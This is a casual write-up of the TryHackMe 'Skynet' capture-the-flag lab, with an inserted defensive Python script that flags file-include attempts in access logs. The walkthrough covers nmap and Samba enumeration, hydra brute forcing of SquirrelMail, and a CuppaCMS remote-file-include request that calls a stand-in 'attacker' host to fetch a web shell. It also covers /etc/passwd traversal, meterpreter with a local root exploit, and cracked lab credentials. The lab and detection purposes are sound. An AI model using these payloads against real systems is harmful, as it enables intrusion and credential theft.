[Skynet] – TryHackMe

I’m rebuilding the Skynet CTF on TryHackMe from vague notes, so I apologize for anything that’s mildly off. I’ve been drinking and it was a few days ago. We always start off with enumeration: port scan, banner grab, service check, the usual. My ctf_quick alias is [code]sudo nmap -sS -sV -O -vvv -T4 --script=vulners,intrusive --script-timeout=2m -oA ctf_quick[/code]. I often attach a few more flags if needed, namely [code]-p- -Pn[/code], when I want to be sure to check all ports or when the target doesn’t respond to ICMP requests. My ctf_deep is mostly the same: script-timeout is set to 5 minutes, there’s no -T4 flag, and version intensity is set to 9. For both, I have an [code]alias BRUTE='--script-args userdb=top-probable,passdb=1000worst'[/code] that I can pop in there. Generally, though, I’ll only pop that into the deep scan with the longer timeout, for obvious reasons.

It has a webserver, so we go ahead and launch a directory scanner too. I used either the lowercase directory-list 2.3 medium or big from SecLists/Discovery/Web-Content. It picks up a few folders, most of which return 403: admin, config and ai for sure. There are also css and js; I forget whether they 403’d or not, but either way they weren’t enlightening. /squirrelmail sticks out, however. We know what that is, and the questions ask about email content, so it’s a great place to start. Just bear in mind that e-mail accounts may not have shell access, and authorization may vary.

When nmap finishes, we notice there’s a Samba share. We enumerate it; it picks up a few shares and a user ‘milesdyson’. Accessing the only share that allows anonymous access reveals log1.txt, which looks like a wordlist. The CTF is Skynet and it’s all Terminator themed (Miles Dyson, etc.). We set hydra to work on squirrelmail using the milesdyson user and the wordlist, and it cracks with a password of cyborg007haloterminator (this CTF is considered easy). Logging in, we see emails from the host itself regarding milesdyson’s Samba password, so we write that down: )s{A&2Z=F^n_E.B`

We note emails from a potential user ‘serenakogan’ and a binary-encoded email. We decode it; it’s mostly uninteresting and says ‘balls have zero to me to me to me to me to me to me to me’. serenakogan’s next e-mail is similar, almost the same. We check milesdyson’s Samba share with his credentials and they work, yay. He’s messaged himself about finishing the new CMS and mentions a string of nonsensical characters, 45kra24zxs28v3yd. Given that the question asks about a hidden directory, and neither squirrelmail nor the others are very hidden at all, plus the fact that important.txt mentions finishing a CMS, we try browsing to that folder and it exists. It looks benign, but we go ahead and brute force directories here too, and we find another one, administrator; it’s running CuppaCMS. So, we set the string aside in a note; it could still be a password or need to be cracked or decoded.

We look for vulnerabilities in CuppaCMS and find a nasty file-include vulnerability (it allows both remote file include and local file include). Local is easier to perform, so we check the obvious things: /etc/passwd (to confirm which user accounts actually exist on the host), and CuppaCMS reveals MySQL credentials, root:password123. Informative, but nothing groundbreaking, so we go ahead with a remote file include. I used weevely3, but you can use whatever. Make the RFI payload available with python3’s built-in webserver (or any webserver). My include looked like this: [code]http://ctf-target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt?[/code]
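From the defender’s side, the include above leaves a very recognisable trace in the web server’s access log. This is an added example, not part of the write-up or of CuppaCMS: a small Python checker that flags remote (URL) and local (traversal) values in the urlConfig parameter; the log lines are constructed for the demo, not captured from the CTF host.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache/nginx combined-format access log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Query parameters that feed the include. urlConfig is the one from the write-up;
# any other names added here would be assumptions about the application being monitored.
WATCHED_PARAMS = {"urlConfig"}

def classify_value(value):
    """Return 'remote-include', 'local-include' or None for one parameter value."""
    decoded = unquote(unquote(value))          # second pass catches double-encoded %252e
    lower = decoded.lower()
    if "://" in lower or lower.startswith(("php:", "data:", "file:")):
        return "remote-include"               # URL or stream wrapper pulled from elsewhere
    if "../" in decoded or "..\\" in decoded or decoded.startswith("/"):
        return "local-include"                # traversal or absolute path on the host
    return None

def scan_access_log(text):
    """Return (client_ip, kind, path, value) for every suspicious include parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                kind = classify_value(value)
                if kind:
                    hits.append((m["ip"], kind, url.path, value))
    return hits

# Constructed sample log lines (not from the CTF host): one plain admin request,
# one RFI, one LFI, one URL-encoded LFI and one harmless-looking value.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt? HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1420
10.0.0.9 - - [01/Jan/2020:10:00:12 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1420
10.0.0.5 - - [01/Jan/2020:10:00:15 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=alertConfig.php HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for ip, kind, path, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {kind:15} {path} {value}")
```

Three of the five constructed lines are flagged, all from the same client, which is the grouping you would alert on.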

I used the shell to throw down a meterpreter session and went straight for root using exploit/linux/local/ufo_privilege_escalation. It worked. Working backwards, another user was admin:b686468aec2c71e1783375763dca9b7e

Sorry for the crap write-up.